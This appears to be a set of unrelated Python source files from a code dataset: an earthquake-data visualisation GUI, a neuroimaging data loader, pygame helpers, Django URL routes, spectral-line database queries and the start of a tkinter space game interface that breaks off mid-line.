columns = data.columns.values\n t = data.shape[0]\n df = data.copy() \n nclases = df[columns[idc]].nunique()\n cont_clases = [0]*nclases\n clase_predic = [0]*t\n for i in range(t):\n clase_predic[i] = clase(k, i, df, l, columns, t, idc, nclases)\n cont_clases[clase_predic[i] - 1]+=1 \n df['predicted class'] = clase_predic\n \n return df, np.std(cont_clases)/np.mean(cont_clases), cont_clases\n\n\ndata = pd.read_csv(\"earthquake.csv\")\ndata = data.head(500)\ndata = normalizarfechas(data,[1], 4, 0)\ndata = normalizarfechas(data,[2], 2, 2)\ndata = pd.DataFrame(data, columns = ['id', 'date', 'time', 'lat', 'long', 'city', 'direction', 'depth', 'xm', 'md', 'richter', 'ms', 'mb']) \ndata = mapearColumnas(data, [1,2,5,6])\nindices = np.r_[1:5, 6:13]\ndata = normalizarDataset(data, indices)\n_, ratios = pca(data, indices, 2)\nindices = [2,3]\nkmeansdata = kmeans(_, indices, 3, 5, 2)\n\ndef ratio_barplot():\n import matplotlib.pyplot as plt\n _, ratios = pca(data, np.r_[1:5, 6:13], 11)\n ratios_bar = pd.DataFrame({(\"PCA\"+str(i+1)):[ratios[i]] for i in range(len(ratios)-1)})\n ratios_bar.plot.bar(alpha=0.5)\n plt.ylabel('Varianza de ratios', fontsize=16)\n plt.gca().axes.get_xaxis().set_visible(False)\n plt.show()\n\ndef knnvarianza():\n import matplotlib.pyplot as plt\n \"\"\" Real code, commented out because it takes a long time to run\n diferentesknns = []\n y = [] # dataknns\n ks_prob = [2,4,8,16,32,64]\n for i in ks_prob:\n A, B, _ = knn(data, [2,3,4], i, 1)\n diferentesknns.append(A)\n y.append(B)\n \"\"\"\n x = [2,4,8,16,32,64]\n y = [1.1775228235579978, 1.4017703092875093, # dataknns\n 1.7239489551607958, 2.001239615838143,\n 2.2075506789199655, 2.441704322804053]\n plt.figure()\n plt.plot(x, y)\n\n for i_x, i_y in zip(x, y):\n plt.text(i_x, i_y, '({}, {})'.format(i_x, str(round(i_y, 2))))\n plt.ylabel('Coeficiente de varianza', fontsize=16)\n plt.xlabel('Number of Clusters', fontsize=16)\n\n plt.show()\n\ndef kmeansPCA():\n import matplotlib.pyplot as plt\n X = kmeansdata[\"principal_component_1\"]\n Y = kmeansdata[\"principal_component_2\"]\n C = kmeansdata[\"tipo\"]\n plt.figure()\n plt.scatter(X, Y, c=C)\n plt.title('Kmeans de 2 dimensiones')\n plt.xlabel('Componente principal 1', fontsize=16)\n plt.ylabel('Componente principal 2', fontsize=16)\n plt.show()\n\ndef skylinesPCA():\n import matplotlib.pyplot as plt\n datapca, ratios = pca(data, np.r_[1:5, 6:13], 2)\n dfSky = skylines(datapca, [2,3])\n X = pd.concat([datapca[\"principal_component_1\"], dfSky[\"principal_component_1\"]])\n Y = pd.concat([datapca[\"principal_component_2\"], dfSky[\"principal_component_2\"]])\n C = len(datapca)*[\"b\"] + len(dfSky)*[\"r\"]\n\n plt.figure()\n plt.scatter(X, Y, c=C)\n\n plt.title('Skylines de 2 PCA')\n plt.xlabel('Componente principal 1', fontsize=16)\n plt.ylabel('Componente principal 2', fontsize=16)\n\n plt.show()\n\ndef PCA3D():\n import random\n import matplotlib.pyplot as plt\n import numpy as np\n from matplotlib import colors\n from matplotlib.ticker import PercentFormatter\n from mpl_toolkits.mplot3d import Axes3D\n\n indices = [2,3,4]\n data_pca3, ratios = pca(data, indices, 3)\n\n nclases = data_pca3['city'].nunique()\n xs = data_pca3['principal_component_1']\n ys = data_pca3['principal_component_2']\n zs = data_pca3['principal_component_3']\n\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n\n for i in range(len(xs)):\n ax.scatter(xs[i], ys[i], zs[i], c = \"#\" + \"%06x\" % random.randint(0, 0xFFFFFF))\n\n ax.set_xlabel('PCA1')\n ax.set_ylabel('PCA2')\n 
ax.set_zlabel('PCA3')\n\n plt.show()\n\ndef Radar():\n from math import pi\n import matplotlib.pyplot as plt\n def radarPlot(df, row, categorias, color,title):\n N = len(categorias)\n valores = df.loc[df.index[row]].values[categorias].flatten().tolist() \n valores += valores[:1]\n angulos = [n / float(N) * 2 * pi for n in range(N)]\n angulos += angulos[:1]\n ax = plt.subplot(3, 2, row + 1, polar=True, )\n ax.set_theta_offset(pi / 2)\n ax.set_theta_direction(-1)\n etiquetas = [df.columns[i] for i in categorias]\n plt.xticks(angulos[:-1], etiquetas, color='grey', size=8)\n ax.set_rlabel_position(0)\n tic = 5\n plt.yticks([i * (1.0 / tic) for i in range(1,tic)], [str(i * (1.0 / tic)) for i in range(1,tic)], color=\"grey\", size=7)\n plt.ylim(0,1)\n ax.plot(angulos, valores, color=color, linewidth=2, linestyle='solid')\n ax.fill(angulos, valores, color=color, alpha=0.4)\n plt.title(title.capitalize(), size=11, color=color, y=1.1)\n def radarAllPlot(df,categorias):\n my_dpi=96\n plt.figure(figsize=(1000/my_dpi, 1000/my_dpi), dpi=my_dpi)\n my_palette = plt.cm.get_cmap(\"Set2\", len(df.index))\n for i in range(len(df.index)):\n radarPlot(df,i,categorias,my_palette(i), data['city'][i])\n data = pd.read_csv(\"earthquake.csv\")\n data = data.head(500)\n data = normalizarfechas(data,[1], 4, 0)\n data = normalizarfechas(data,[2], 2, 2)\n data = pd.DataFrame(data, columns = ['date', 'time', 'lat', 'long', 'city', 'direction', 'depth', 'xm', 'md', 'richter', 'ms', 'mb']) \n data = mapearColumnas(data, [0,1,5])\n indices = np.r_[:4, 6:8]\n data = normalizarDataset(data, indices)\n maximin_ = maximin(data, indices)\n maximin_.head()\n radarAllPlot(maximin_.head(6),indices)\n plt.show()\n\ndef plotWA():\n import matplotlib.pyplot as plt\n data = pd.read_csv(\"earthquake.csv\")\n data = data.head(500)\n data = normalizarfechas(data,[1], 4, 0)\n data = normalizarfechas(data,[2], 2, 2)\n data = pd.DataFrame(data, columns = ['id', 'date', 'time', 'lat', 'long', 'city', 'direction', 'depth', 'xm', 'md', 'richter', 'ms', 'mb']) \n data = mapearColumnas(data, [1,2,5,6])\n pesos = [0, 0, 10, 10, 10, 0, 30, 10, 10, 10, 10]\n dfWA = weightedAverage(data, pesos, [0, 1, 2, 3, 6, 7])\n\n x = [i for i in range(len(dfWA['id']))]\n y = dfWA['wa']\n\n import numpy as np\n poly = np.polyfit(x,y,11)\n poly_y = np.poly1d(poly)(x)\n plt.plot(x,y, alpha=0.5)\n plt.plot(x,poly_y)\n\n plt.title('Weighted Average')\n plt.xlabel('Indices (orden por fecha)', fontsize=16)\n plt.ylabel('WA', fontsize=16)\n\n plt.show()\n\ndef Radar2():\n import matplotlib.pyplot as plt\n import numpy as np\n from math import pi\n month_lst = ['January', 'Feburary', 'March', 'April', 'May', 'June', 'July', \n 'August', 'September', 'October', 'November', 'December']\n def radarPlot(df, row, categorias, color,title):\n N = len(categorias)\n valores = df.loc[df.index[row]].values[categorias].flatten().tolist() \n valores += valores[:1]\n angulos = [n / float(N) * 2 * pi for n in range(N)]\n angulos += angulos[:1]\n ax = plt.subplot(3, 2, row + 1, polar=True, )\n ax.set_theta_offset(pi / 2)\n ax.set_theta_direction(-1)\n etiquetas = [df.columns[i] for i in categorias]\n plt.xticks(angulos[:-1], etiquetas, color='grey', size=8)\n ax.set_rlabel_position(0)\n tic = 5\n plt.yticks([i * (1.0 / tic) for i in range(1,tic)], [str(i * (1.0 / tic)) for i in range(1,tic)], color=\"grey\", size=7)\n plt.ylim(0,1)\n ax.plot(angulos, valores, color=color, linewidth=2, linestyle='solid')\n ax.fill(angulos, valores, color=color, alpha=0.4)\n 
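# title each radar chart with the month name recovered from the mapped 'date' value\n 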
plt.title(str(month_lst[title-1]).capitalize(), size=11, color=color, y=1.1)\n def radarAllPlot(df,categorias):\n my_dpi=96\n plt.figure(figsize=(1000/my_dpi, 1000/my_dpi), dpi=my_dpi)\n my_palette = plt.cm.get_cmap(\"Set2\", len(df.index))\n for i in range(len(df.index)):\n radarPlot(df,i,categorias,my_palette(i), data['date'][i])\n def normalizacionColumna(df, i):\n columns = df.columns.values\n df[columns[i]] = (df[columns[i]] - df[columns[i]].min()) / (df[columns[i]].max() - df[columns[i]].min())\n def normalizarDataset(data, indices):\n df = data.copy()\n for i in indices:\n normalizacionColumna(df, i)\n return df\n def normalizarfechas(data, indices, ini, fin, medio):\n df = data.copy()\n columns = df.columns.values\n for i in indices:\n a = []\n for j in range(data.shape[0]):\n if(medio != -1):\n st = df[columns[i]][j][ini:-fin]\n else:\n st = df[columns[i]][j][:ini]\n if(fin != 0):\n st+= df[columns[i]][j][-fin:]\n a.append(st)\n df[columns[i]] = a\n return df\n data = pd.read_csv(\"earthquake.csv\")\n data = data.head(500)\n data = normalizarfechas(data,[1], 5, 3, 0)\n data = normalizarfechas(data,[2], 2, 2, -1)\n data = pd.DataFrame(data, columns = ['date', 'time', 'lat', 'long', 'city', 'direction', 'depth', 'xm', 'md', 'richter', 'ms', 'mb']) \n data = mapearColumnas(data, [0,1,4,5])\n indices = np.r_[1:5, 6:9]\n data = normalizarDataset(data, indices)\n dflx = leximax(data, indices)\n dflx.head(6)\n radarAllPlot(dflx.head(6),indices)\n plt.show()\n\ndef FreqAprox():\n def normalizacionColumna(df, i):\n columns = df.columns.values\n df[columns[i]] = (df[columns[i]] - df[columns[i]].min()) / (df[columns[i]].max() - df[columns[i]].min())\n \n def normalizarDataset(data, indices):\n df = data.copy()\n for i in indices:\n normalizacionColumna(df, i)\n return df\n\n def mapearColumna(df, col):\n val = []\n for j in range(df.shape[0]):\n val.append(df[col][j])\n unicos = list(set(val))\n for j in range(df.shape[0]):\n indice = 0\n for _ in range(len(unicos)):\n if(unicos[_] == df[col][j]):\n indice = _ + 1\n break\n val[j] = indice\n return val\n\n def mapearColumnas(data, indices):\n df = data.copy()\n columns = df.columns.values\n for i in indices:\n df[columns[i]] = mapearColumna(df, columns[i])\n return df\n\n def normalizarfechas(data, indices, ini, fin, medio):\n df = data.copy()\n columns = df.columns.values\n for i in indices:\n a = []\n for j in range(data.shape[0]):\n if(medio != -1):\n st = df[columns[i]][j][ini:-fin]\n else:\n st = df[columns[i]][j][:ini]\n if(fin != 0):\n st+= df[columns[i]][j][-fin:]\n a.append(st)\n df[columns[i]] = a\n return df\n import matplotlib.pyplot as plt\n import pandas as pd\n import numpy as np\n data = pd.read_csv(\"earthquake.csv\")\n data = data.head(500)\n data = normalizarfechas(data,[1], 5, 3, 0)\n data = normalizarfechas(data,[2], 2, 2, -1)\n data = pd.DataFrame(data, columns = ['date', 'time', 'lat', 'long', 'city', 'direction', 'depth', 'xm', 'md', 'richter', 'ms', 'mb']) \n data = mapearColumnas(data, [0,1,4,5])\n indices = np.r_[0:5, 6:9]\n data = normalizarDataset(data, indices)\n data.head()\n a,b,c = knn(data, indices, 4,5)\n\n x = [i for i in range(len(c))]\n y = c\n \n plt.plot(x,y)\n\n plt.title('Direcciones de terremotos predecidas')\n plt.ylabel('Frecuencia', fontsize=16)\n plt.xlabel('Dirección', fontsize=16)\n\n plt.show()\n\n##################################################################\nfrom tkinter import *\nimport webbrowser\n\nroot = Tk()\nroot.winfo_toplevel().title(\"TF - Administración de la 
información\")\nroot.geometry(\"400x300\")\n\ndef callback(url):\n webbrowser.open_new(url)\nlink1 = Label(root, text=\"Earthquakes in 1910-2017\", fg=\"blue\", cursor=\"hand2\")\nlink1.pack()\nlink1.bind(\"\", lambda e: callback(\"https://www.kaggle.com/caganseval/earthquake\"))\n##\n\ngraphicRat = Button(root, text=\"Explained variance ratio of PCA\", width=40, command = ratio_barplot)\ngraphicRat.pack()\n\ngraphicPCA3D = Button(root, text=\"Componentes principales 3D\", width=40, command = PCA3D)\ngraphicPCA3D.pack()\n\ngraphicKmeanPCA = Button(root, text=\"Kmean-PCA\", width=40, command = kmeansPCA)\ngraphicKmeanPCA.pack()\n\ngraphicKnn = Button(root, text=\"Coeficiente de varianza en Knn\", width=40, command = knnvarianza)\ngraphicKnn.pack()\n\ngraphicSkylinesPCA = Button(root, text=\"Skylines de 2 PCA\", width=40, command = skylinesPCA)\ngraphicSkylinesPCA.pack()\n\ngraphicRadar = Button(root, text=\"Maximin data real\", width=40, command = Radar)\ngraphicRadar.pack()\n\ngraphicRadar2 = Button(root, text=\"Leximax Data real Top Terremotos por Mes\", width=40, command = Radar2)\ngraphicRadar2.pack()\n\ngraphicWA = Button(root, text=\"Weighted Average\", width=40, command = plotWA)\ngraphicWA.pack()\n\ngraphicFreqAprox = Button(root, text=\"Direcciones de terremotos predecidas con Knn\", width=40, command = FreqAprox)\ngraphicFreqAprox.pack()\n\nroot.mainloop()\n","sub_path":"Interfaz/main.pyw","file_name":"main.pyw","file_ext":"pyw","file_size_in_byte":20715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"42015653","text":"# Copyright (c) 2014--2020 Tony (Muhammad) Yousefnezhad\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nimport os\nimport numpy as np\nimport scipy.io as sio\n\n\ndef LoadEzData(Header=None,data=None):\n if Header is None:\n print(\"Please enter header file!\")\n return None\n\n if not os.path.isfile(Header):\n print(\"Header file is not found!\")\n return None\n\n try:\n Out = sio.loadmat(Header, appendmat=False)\n Int = Out[\"Integration\"]\n except:\n print(\"Cannot load header file!\")\n return None\n try:\n DataStruct = Int[\"DataStructure\"][0]\n DataKey = list()\n for key in DataStruct:\n if data is None:\n DataKey.append(key)\n else:\n if key in data:\n DataKey.append(key)\n\n if not len(DataKey):\n print(\"WARNING: No data key found!\")\n else:\n if Out['DataFileType'][0][0] == 0:\n print(\"Data file type is NII.GZ\")\n else:\n print(\"Data file type is EZMAT\")\n for dkey in DataKey:\n X = None\n dfiles = np.array(Int[dkey[0] + \"_files\"])[0][0]\n for fdata in dfiles:\n try:\n if Out['DataFileType'][0][0] == 0:\n import nibabel as nb\n niiimgdata = nb.load(str.strip(os.path.dirname(Header) + \"/\" + fdata))\n dat = np.transpose(niiimgdata.get_data())\n X = dat if X is None else np.concatenate((X, dat))\n del dat, niiimgdata\n else:\n dat = sio.loadmat(str.strip(os.path.dirname(Header) + \"/\" + fdata), appendmat=False)[dkey[0]]\n X = dat if X is None else np.concatenate((X,dat))\n del dat\n print(\"Data %s is loaded!\" % (fdata))\n except Exception as e:\n print(str(e))\n return None\n Out[dkey[0]] = X\n except:\n print(\"DEBUG: Error in loading data files!\")\n return None\n return Out\n","sub_path":"IO/EasyData.py","file_name":"EasyData.py","file_ext":"py","file_size_in_byte":3247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"380634287","text":"'''\nCreated on Oct 27, 2013\n\n@author: Dean, God Almighty of Sex and Women\n'''\nimport pygame, sys, os, math\nfrom pygame.locals import *\n\n\ndef get_image(path, colorkey):\n image = pygame.image.load(path).convert()\n image.set_colorkey(colorkey)\n return image\n\ndef create_image_list(path, filename, numimages, filetype, colorkey):\n imagelist = []\n if numimages >= 10:\n for i in range(0,numimages+1):\n if i < 10:\n imageloc = os.path.join(path, filename) +'0' + str(i) + filetype\n image = get_image(imageloc,colorkey)\n imagelist.append(image)\n \n else:\n imageloc = os.path.join(path, filename) + str(i) + filetype\n image = get_image(imageloc, colorkey)\n imagelist.append(image)\n else:\n for i in range(0,numimages + 1):\n imageloc = os.path.join(path,filename) + str(i) + filetype\n image = get_image(imageloc,colorkey)\n imagelist.append(image)\n \n return imagelist\n\ndef load_imageset(imagedict):\n images = {}\n for item in imagedict.keys():\n images[item] = create_image_list(imagedict[item][0], imagedict[item][1], imagedict[item][2], '.bmp', (255,0,255))\n return images\n\ndef xfrange(start, stop, step):\n if step > 0:\n while start < stop:\n yield start\n start += step\n \n else:\n while start > stop:\n yield start\n start += step\n \n \ndef get_dist(pos1, pos2):\n return (int(abs(pos1[0] - pos2[0])))**2 + (int(abs(pos1[1] - pos2[1])))**2\n \ndef textHollow(font, message, fontcolor):\n notcolor = [c^0xFF for c in fontcolor]\n base = font.render(message, 0, fontcolor, notcolor)\n size = base.get_width() + 
2, base.get_height() + 2\n img = pygame.Surface(size, 16)\n img.fill(notcolor)\n base.set_colorkey(0)\n img.blit(base, (0, 0))\n img.blit(base, (2, 0))\n img.blit(base, (0, 2))\n img.blit(base, (2, 2))\n base.set_colorkey(0)\n base.set_palette_at(1, notcolor)\n img.blit(base, (1, 1))\n img.set_colorkey(notcolor)\n return img\n\ndef textOutline(font, message, fontcolor, outlinecolor):\n base = font.render(message, 0, fontcolor)\n outline = textHollow(font, message, outlinecolor)\n img = pygame.Surface(outline.get_size(), 16)\n img.blit(base, (1, 1))\n img.blit(outline, (0, 0))\n img.set_colorkey(0)\n return img\n\n\n\n \n","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"228082149","text":"from django.urls import path\nfrom . import views\nurlpatterns = [\n #posts\n path('', views.all_posts, name=\"index\"),\n path('create_post', views.create_post, name=\"create_post\"),\n path('update_post', views.update_post,name=\"update_post\"),\n path('delete_post', views.delete_post, name=\"delete_post\"),\n path('detail_post', views.detail_post,name=\"detail_post\"),\n #comments\n path('show_comments/<int:post_id>', views.show_post_comments)\n]","sub_path":"posts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"92051350","text":"\"\"\"\nFunctions for reading theoretical data from the database.\nAuthor: Lilla Lugosi\nDate: 20/08/2019\nName: theoretical_function.py\n\"\"\"\n\nfrom theory_db_helper import *\nfrom calibration_function import *\nfrom scipy.signal import find_peaks\n\n\ndef chargelist_for_element(ts,element_name):\n \"database, chemical symbol for element\\nReturns list of charge states available in the database\"\n data=ts.query({'element':element_name})\n ch = [x['charge'] for x in data]\n chargelist=np.unique(ch)\n return chargelist\n\n\ndef find_waves(ts,elementname,ch):\n \"database, chemical symbol for element, one of the available charge states\\nFind the highest intensity peak. On that energy level find the highest peaks. Returns list of wavelengths of the highest peaks\"\n part=ts.query({'element':elementname,'charge':int(ch)})\n int_max = max([x['intensity'] for x in part])\n int_min = min([x['intensity'] for x in part])\n\n intens = [x['intensity'] for x in part]\n idx=intens.index(int_max)\n\n Emax=part[idx][\"energy\"]\n\n wave=[]\n for i in range(len(part)):\n if part[i][\"intensity\"] > ((int_max-int_min)*0.1+int_min) and part[i][\"energy\"]== Emax:\n wave.append(part[i][\"wavelength\"])\n return wave\n\n\ndef get_energy_intensity(ts,charges,element_name):\n \"database, available charge states, chemical symbol for element\\nReturns matrix of energies and intensities. 
First index refers to one charge state, second index for peaks at one wavelength\"\n E=[[] for _ in range(len(charges))]\n I=[[] for _ in range(len(charges))]\n wavedat=[[] for _ in range(len(charges))]\n for i in range(len(charges)): \n waves=find_waves(ts,element_name,charges[i]) \n wavedat[i]=waves\n for j in range(len(waves)):\n partwave=ts.query({'element':element_name,'charge':int(charges[i]),\"wavelength\":waves[j]})\n en=[]\n inte=[]\n for k in range(len(partwave)):\n #if partwave[k][\"energy\"] not in en:\n en.append(partwave[k][\"energy\"])\n #if partwave[k][\"intensity\"] not in inte:\n inte.append(partwave[k][\"intensity\"])\n E[i].append(en)\n I[i].append(inte)\n return E, I,wavedat\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"theoretical_function.py","file_name":"theoretical_function.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"206688947","text":"from tkinter import *\nimport os,os.path\nimport sys\nimport random\n\nclass Vue():\n\tdef __init__(self,parent,ip,nom):\n\t\tself.parent=parent\n\t\tself.root=Tk()\n\n\t\t#self.root.attributes('-fullscreen', 1) # For full screen\n\t\tself.root.configure(bg='#1c4873') # Background of my page\n\t\t\n\t\tself.button = Button(self.root, text=\"X\", command=self.root.destroy, font='arial 20', relief=FLAT,bg='#1c4873',foreground=\"white\")\n\t\tself.button.pack(side=TOP, anchor=E) \n\t\t\n\t\tself.cadreactif=None\n\t\tself.maselection=None\n\t\tself.root.title(os.path.basename(sys.argv[0]))\n\t\tself.modele=None\n\t\tself.nom=\"\"\n\t\tself.cadreapp=Frame(self.root,width=800,height=600)\t\t\t# Base frame for my windows\n\t\tself.cadreapp.pack(fill=\"none\", expand=True) # To center the window\n\t\tself.creercadresplash(ip,nom)\n\t\tself.creercadrelobby()\n\t\tself.changecadre(self.cadresplash)\n\t\tself.vbar = None\n\t\tself.hbar = None\n\t\t\n\tdef fermerfenetre(self):\n\t\tself.parent.fermefenetre()\n\t\t\n\tdef changecadre(self,cadre):\n\t\tif self.cadreactif:\n\t\t\tself.cadreactif.pack_forget()\n\t\tself.cadreactif=cadre\n\t\tself.cadreactif.pack()\n\t\t\t\n\tdef creercadresplash(self,ip,nom):\n\t\t\n\t\tself.cadresplash=Frame(self.cadreapp,bg='#15243d')\n\t\n\t\tself.titre = Label(self.cadresplash, text = \"Bienvenue dans la galaxie orion voyageur!\",bg='#15243d',font='arial 20',foreground=\"white\")\n\t\tself.titre.pack(pady=(100,20),padx=100);\n\t\t\n\t\tsoustitre=Label(self.cadresplash, text = \"Pour des fin de securite veuillez vous identifier\",bg='#15243d',font='arial 16',foreground=\"white\")\n\t\tsoustitre.pack(pady=10,padx=10);\n\t\t\n\t\tself.nomsplash=Entry(self.cadresplash,bg='#A3C5D8',relief=FLAT,foreground=\"white\",font='arial 14',highlightthickness=2,highlightcolor='#849fae')\n\t\tself.nomsplash.insert(0, nom)\n\t\tself.nomsplash.pack(pady=10)\n\t\t\n\t\tself.ipsplash=Entry(self.cadresplash,bg='#A3C5D8',relief=FLAT,foreground=\"white\",font='arial 14',highlightthickness=2,highlightcolor='#849fae')\n\t\tself.ipsplash.insert(0, ip)\n\t\tself.ipsplash.pack(pady=20)\n\t\t\n\t\t\n\t\tbtncreerpartie=Button(self.cadresplash,text=\"Creer partie\",bg='#A3C5D8',command=self.creerpartie,relief=FLAT,font='arial 12')\n\t\tbtncreerpartie.pack(fill=\"both\", expand=True,side=LEFT, padx=(75,5),pady=(0,50))\n\t\tbtnconnecterpartie=Button(self.cadresplash,text=\"Connecter partie\",bg='#A3C5D8',command=self.connecterpartie,relief=FLAT,font='arial 12')\n\t\tbtnconnecterpartie.pack(fill=\"both\", 
expand=True,side=LEFT,padx=(5,75),pady=(0,50))\n\t\t\n\n\t\t\t\n\tdef creercadrelobby(self):\n\t\tself.cadrelobby=Frame(self.cadreapp,bg='#15243d')\n\t\t\n\t\tself.titre=Label(self.cadrelobby,text=\"Rebonjour Voyageur\",bg='#15243d',font='arial 20',foreground=\"white\")\n\t\tself.titre.pack(pady=(50,0))\n\t\t\t \n\t\t\n\t\tself.listelobby=Listbox(self.cadrelobby,bg='#A3C5D8',borderwidth=0,relief=FLAT,width=60,height=20)\n\t\tself.listelobby.pack(side=LEFT,pady=50,padx=(75,10));\n\t\t\n\t\tself.nbetoile=Entry(self.cadrelobby,bg='#A3C5D8',width=30,relief=FLAT,font='arial 12',justify=CENTER)\n\t\tself.nbetoile.insert(0, 100)\n\t\tself.nbetoile.pack(pady=(50,10),padx=(10,75));\n\t\t\n\t\tself.largeespace=Entry(self.cadrelobby,bg='#A3C5D8',width=30,relief=FLAT,font='arial 12',justify=CENTER) \n\t\tself.largeespace.insert(0, 1000)\n\t\tself.largeespace.pack(pady=(10,10),padx=(10,75));\n\t\t\n\t\tself.hautespace=Entry(self.cadrelobby,bg='#A3C5D8',width=30,relief=FLAT,font='arial 12',justify=CENTER)\n\t\tself.hautespace.insert(0, 800)\n\t\tself.hautespace.pack(pady=(10,10),padx=(10,5));\n\t\t\n\t\tbtnlancerpartie=Button(self.cadrelobby,text=\"Lancer partie\",command=self.lancerpartie,bg='#A3C5D8',relief=FLAT,font='arial 12')\n\t\tbtnlancerpartie.pack(fill=X,pady=(0,50),padx=(10,75),side=BOTTOM)\n\t\t\n\n\t\t\n\tdef connecterpartie(self):\n\t\tnom=self.nomsplash.get()\n\t\tip=self.ipsplash.get()\n\t\tif nom and ip:\n\t\t\tself.parent.inscrirejoueur()\n\t\t\tself.changecadre(self.cadrelobby)\n\t\t\tprint(\"BOUCLEATTENTE de CONNECTER\")\n\t\t\tself.parent.boucleattente()\n\t\t\n\tdef creerpartie(self):\n\t\tnom=self.nomsplash.get()\n\t\tip=self.ipsplash.get()\n\t\tif nom and ip:\n\t\t\tself.parent.creerpartie()\n\t\t\tself.parent.inscrirejoueur()\n\t\t\tself.changecadre(self.cadrelobby)\n\t\t\tprint(\"BOUCLEATTENTE de CREER\")\n\t\t\tself.parent.boucleattente()\n\t\t\n\tdef lancerpartie(self):\n\t\tself.parent.lancerpartie()\n\t\t\n\tdef affichelisteparticipants(self,lj):\n\t\tself.listelobby.delete(0,END)\n\t\tself.listelobby.insert(0,lj)\n\t\t\n\tdef creeraffichercadrepartie(self,mod):\n\t\tself.nom=self.parent.monnom\n\t\tself.mod=mod\n\t\t\n\t\tjoueur=self.mod.joueurs[self.nom]\n\t\tself.cadrepartie=Frame(self.cadreapp)\n\t\tself.cadrejeu=Frame(self.cadrepartie)\n\t\tself.canevas=Canvas(self.cadrepartie,width=mod.largeur,height=mod.hauteur,bg=\"grey11\",scrollregion=(0,0,self.mod.largeur,self.mod.hauteur))\n\t\tself.hbar=Scrollbar(self.cadrepartie,orient=HORIZONTAL, width=0)\n\t\tself.hbar.pack(side=BOTTOM,fill=X)\n\t\tself.hbar.config(command=self.canevas.xview)\n\t\tself.vbar=Scrollbar(self.cadrepartie,orient=VERTICAL,width = 0)\n\t\tself.vbar.pack(side=RIGHT,fill=Y)\n\t\tself.vbar.config(command=self.canevas.yview)\n\t\tself.canevas.config(width=1920,height=1080)\n\t\tself.canevas.config(xscrollcommand=self.hbar.set, yscrollcommand=self.vbar.set)\n\t\tself.canevas.pack(side=LEFT,expand=True,fill=BOTH)\n\t\tself.canevas.pack(side=LEFT)\n\t\t\n\t\tself.canevas.bind(\"<1>\",\t lambda event: self.canevas.focus_set())\n\t\tself.canevas.bind(\"<Up>\",\tlambda event: self.canevas.yview_scroll(-1, \"units\"))\n\t\tself.canevas.bind(\"<Left>\", lambda event: self.canevas.xview_scroll(-1, \"units\"))\n\t\tself.canevas.bind(\"<Down>\", lambda event: self.canevas.yview_scroll( 1, \"units\"))\t\t\n\t\tself.canevas.bind(\"<Right>\", lambda event: self.canevas.xview_scroll( 1, 
\"units\"))\n\n\t\tself.canevas.focus_set()\n\t\t\n\t\tself.canevas.bind(\"\",self.cliqueGaucheCosmos)\n\t\tself.canevas.bind(\"\",self.cliqueDroitCosmos)\n\t\t\n\t\tself.cadreinfo=Frame(self.cadrepartie,width=200,height=100,bg=\"#455571\",relief=RAISED)\n\t\tself.cadreinfo.pack(side=LEFT,fill=Y)\n\t\t\n\t\tself.cadreinfogen=Frame(self.cadreinfo,width=200,height=200,bg=\"#455571\")\n\t\tself.cadreinfogen.pack()\n\t\t\n\t\tself.boiteinfo=Frame(self.cadreinfogen,width=200, height=100,bg=\"#455571\",relief=RAISED)\n\t\tself.boiteinfo.pack(side=BOTTOM)\n\t\t\n\t\tself.boiteinfo2=Frame(self.boiteinfo,width=200, height=100,bg=\"#455571\",relief=RAISED)\n\t\tself.boiteinfo2.pack(side=BOTTOM)\n\t\t\n\t\tself.boiteinfo3=Frame(self.boiteinfo2,width=200, height=100,bg=\"#455571\",relief=RAISED)\n\t\tself.boiteinfo3.pack(side=BOTTOM)\n\t\t\n\t\t\n\t\tself.labid=Label(self.cadreinfogen,text=\"MINI\\nORION\",fg=\"#fbbfda\",bg=\"#455571\",font=(\"Helvetica\",20),pady=10)\n\t\tself.labid.bind(\"